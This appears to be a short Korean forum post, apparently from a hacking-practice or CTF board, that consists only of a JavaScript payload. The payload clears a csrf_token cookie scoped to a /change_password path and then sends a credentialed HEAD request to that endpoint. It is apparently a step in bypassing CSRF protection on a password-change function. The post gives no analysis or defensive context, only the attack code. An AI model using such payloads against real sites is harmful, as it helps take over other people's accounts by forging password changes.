Dd
작성자 8lu3sh311 조회수 7
document.cookie = "csrf_token=; Path=/change_password; SameSite=Lax"; fetch("/change_password", { method: "HEAD", credentials: "include" }).then(response => { console.log("HEAD 요청 완료, 상태:", response.status); }).catch(err => { console.error("요청 실패:", err); });

File :